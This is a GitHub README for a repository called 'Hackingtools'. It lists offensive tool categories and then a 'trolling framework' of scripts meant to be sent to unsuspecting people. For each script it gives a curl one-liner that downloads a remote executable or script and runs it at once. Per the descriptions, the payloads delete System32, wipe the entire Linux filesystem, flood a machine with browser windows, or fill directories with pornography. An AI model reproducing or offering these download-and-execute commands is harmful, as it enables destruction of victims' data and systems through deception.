Skip to content

Tubbz-alt/Hackingtools

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

33 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

Hacking tools

Penetration testing and ethical hacking toolkit.

πŸ›‘ Exploitation - various archived CVE exploits
πŸ”‘ Cryptography - encryption and decryption tools, cipher recognizing tools
πŸ•Ά Anonymizing - proxy scrapers, tor scripts and openvpn configs
βš™ Social engineering - forked social engineering framework, some other handy tools
πŸ’» Hardware hacking - tutorials how-to do stuff like bad usb
πŸ—ƒ File manipulation - file binders, crypters and much more .net and others
πŸ›  Reverse engineering - forked popular reverse engineering frameworks and links to professional courses

ezgif-com-gif-maker-1 Psst, scroll down.

Trolling framework

Build to make fun off script kiddies that will execute any code you send them without inspection, use for fun but do not harm. These scripts are really poorly coded, but friend gave me 24 hours so Im trying to make as much as possible, expect improvement in the future. This little 'project' was made because I wanted to excercise in as many languages as possible.

Windows platform

1 (C#) - Blank screen that you can remember from Async rat, I've made own and it doesnt break your pc when you restart it

curl -sL https://github.com/TheDebianGuy/Hackingtools/blob/master/1/script.exe?raw=true -o script.exe & script.exe

4 (Python) - while True: webbrowser.open('https://pornhub.com'), with 4 threads it was able to break pc, lowered to 2 threads

curl -sL https://github.com/TheDebianGuy/Hackingtools/blob/master/4/script.exe?raw=true -o script.exe & script.exe

5 (Golang) - Classic infinite messagebox with 'You have been hacked!' message

curl -sL https://github.com/TheDebianGuy/Hackingtools/blob/master/5/script.exe?raw=true -o script.exe & script.exe

6 (Batch) - Deleting Sys32 πŸ˜€

curl -sL https://github.com/TheDebianGuy/Hackingtools/blob/master/6/script.bat?raw=true -o script.bat & script.bat

Linux platform

2 (Node.js) - Downloads p0rn in every available directory (not compiled yet)

curl -sL https://github.com/TheDebianGuy/Hackingtools/blob/master/2/script.js?raw=true -o script.js; node script.js

3 (Bash) - Rickrolling while deleting whole filesystem, use when escaping feds, death to whoever launches this without looking at the code πŸ˜‚

curl -sL https://github.com/TheDebianGuy/Hackingtools/blob/master/3/script.sh?raw=true -o script.sh; chmod+x script; ./script.sh

4 (Python) - while True: webbrowser.open('https://pornhub.com'), with 4 threads it was able to break pc, lowered to 2 threads

curl -sL https://github.com/TheDebianGuy/Hackingtools/blob/master/4/script.bin?raw=true -o script.bin; chmod+x script.bin; ./script.bin

7 (Java) - Blank screen, coming soon

About

Hacking toolkit, scroll down 😏

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published